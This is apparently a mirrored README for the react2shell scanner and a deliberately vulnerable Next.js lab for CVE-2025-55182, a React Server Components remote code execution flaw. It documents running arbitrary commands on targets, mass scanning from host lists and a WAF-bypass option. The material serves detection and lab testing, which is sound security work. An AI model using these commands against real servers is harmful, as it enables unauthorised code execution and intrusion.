Share
## https://sploitus.com/exploit?id=164B0414-F3F0-5CD5-9D2F-C1755CA719B3
# Affected Versions

|Component|Recommended Installation Versions|Affected Version Range|
|--|--|--|
|**Node.js**|>= 20.9.0|20.9.0 (LTS) and above|
|**Next.js**|15.0.0|15.x, 16.x(App Router)|
|**React Core**|19.0.0 or 19.2.0|19.0.0 to 19.2.0|
|**RSC Bundler**|react-server-dom-webpack|19.0.0 to 19.2.0|

# Building and Running

1. Force installation of lower versions:
   ```bash
   cd cve-2025-55182-target
   npm install --force
   ```
2. Verify dependency versions:
   ```bash
   npm list react next
   # Ensure the output shows next@15.0.0 and react@19.x.x
   ```
   If the top-level dependency list shows next@15.0.0 and react@19.0.0, the environment is successfully locked in an vulnerable state. You can ignore the warnings and error messages here. 3. Build:
   ```Bash
   npm run build
   ```

4. Run:
   ```Bash
   npm start
   ```
   The server will listen on http://localhost:3000. The environment is set up; you can now proceed with vulnerability detection. # Example

- Vulnerability Detection/Scan:
   ```bash
   cd React2shell
   python3 scanner.py -u http://127.0.0.1:3000/
   ```

- RCE Detection:
   ```bash
   python3 scanner_with_rce.py -u http://127.0.0.1:3000/ -c "ls /"
   ```
   ![poc](react2shell/assets/rce.png)

![poc](react2shell/assets/poc.png)

# References

[react2shell-scanner](https://github.com/assetnote/react2shell-scanner)

## react2shell-scanner

A command-line tool for detecting vulnerabilities in React Server Components (RSC) in Next.js applications, including CVE-2025-55182 and CVE-2025-66478. For detailed information on vulnerability techniques and detection methods, please refer to our blog post: https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478

## How It Works

By default, the scanner sends a specially crafted multipart POST request containing an RCE validation payload for performing deterministic mathematical operations (e.g., 41*271 = 11111). Vulnerable servers will return the result as a response header with `X-Action-Redirect` parameter, ending with `/login?a=11111`. The scanner first tests the root path. If the root path is not vulnerable, it will follow a same-origin redirect (e.g., from `/` to `/en/`) and test the redirected target. Cross-origin redirections are not tested. ### Safe Detection Mode

Use the `--safe-check` flag to enable safe detection mode, which relies on bypass signals such as 500 status codes and specific error summaries without executing code on the target. Use this mode when you do not want to execute RCE checks. ### WAF Bypass

Use the `--waf-bypass` flag to add random interference data before the multipart request body. This helps bypass WAF detections that only analyze the first part of the request body. The default size is 128KB; you can configure it using `--waf-bypass-size`. When WAF bypass is enabled, the timeout automatically increases to 20 seconds (unless explicitly set otherwise). ### Windows Mode

Using the `--windows` flag will replace the payload from the Unix shell (`echo $((41*271))`) with PowerShell (`powershell -c "41*271"`), suitable for targets running on Windows. 

## Environment Requirements

- Python 3.9+
- requests
- tqdm

## Installation

```
pip install -r requirements.txt
```

## Usage

**Scanning a single host:**

```
python3 scanner.py -u https://example.com
```

**Scanning a list of hosts:**

```
python3 scanner.py -l hosts.txt
```

**Scanning with multiple threads and saving results:**

```
python3 scanner.py -l hosts.txt -t 20 -o results.json
```

**Scanning with custom request headers:**

```
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"
```

**Safe bypass detection:**

```
python3 scanner.py -u https://example.com --safe-check
```

**Scanning Windows targets:**

```
python3 scanner.py -u https://example.com --windows
```

**Bypassing WAF with interference data:**

```
python3 scanner.py -u https://example.com --waf-bypass
```

**Executing RCE commands:**

```
python3 scanner.py -u https://example.com -c "ls /"
```

## Option Descriptions

```
-u, --url          Single URL to be checked
-c, --cmd          Command to execute
-l, --list         List of hosts (one per line)
-t, --threads      Number of concurrent threads (default: 10)
--timeout          Timeout for requests (seconds, default: 10)
-o, --output       Output file for results (JSON format)
--all-results     Save all results, not only hosts with vulnerabilities
-k, --insecure     Disable SSL certificate verification
-H, --header        Custom request headers (multiple uses allowed)
-v, --verbose      Display details of hosts with vulnerabilities
-q, --quiet        Only output hosts with vulnerabilities
--no-color         Disable color output
--safe-check       Use safe bypass detection instead of RCE PoC
--windows        Replace Unix shell with Windows PowerShell payload
--waf-bypass       Add interference data to bypass WAF content detection
--waf-bypass-size  Size of interference data (KB, default: 128)
```

## Thanks

The RCE PoC was originally disclosed by [@maple3142](https://x.com/maple3142) – we are very grateful for their contributions in making this tool available. This tool was initially developed to detect RCE vulnerabilities. This feature can still be used in the `--safe-check` safe detection mode. 

- **Assetnote Security Research Team**: [Adam Kues, Tomais Williamson, Dylan Pindur, Patrik Grobshäuser, Shubham Shah](https://x.com/assetnote)
- [xEHLE_](https://x.com/xEHLE_) – Reflecting RCE output in response headers
- [Nagli](https://x.com/galnagli)

## Output

Results are displayed in the terminal. When using the `-o` parameter, hosts with vulnerabilities are saved as a JSON file, including complete HTTP requests and responses for verification.

[source-iocs-preserved url=http://localhost:3000]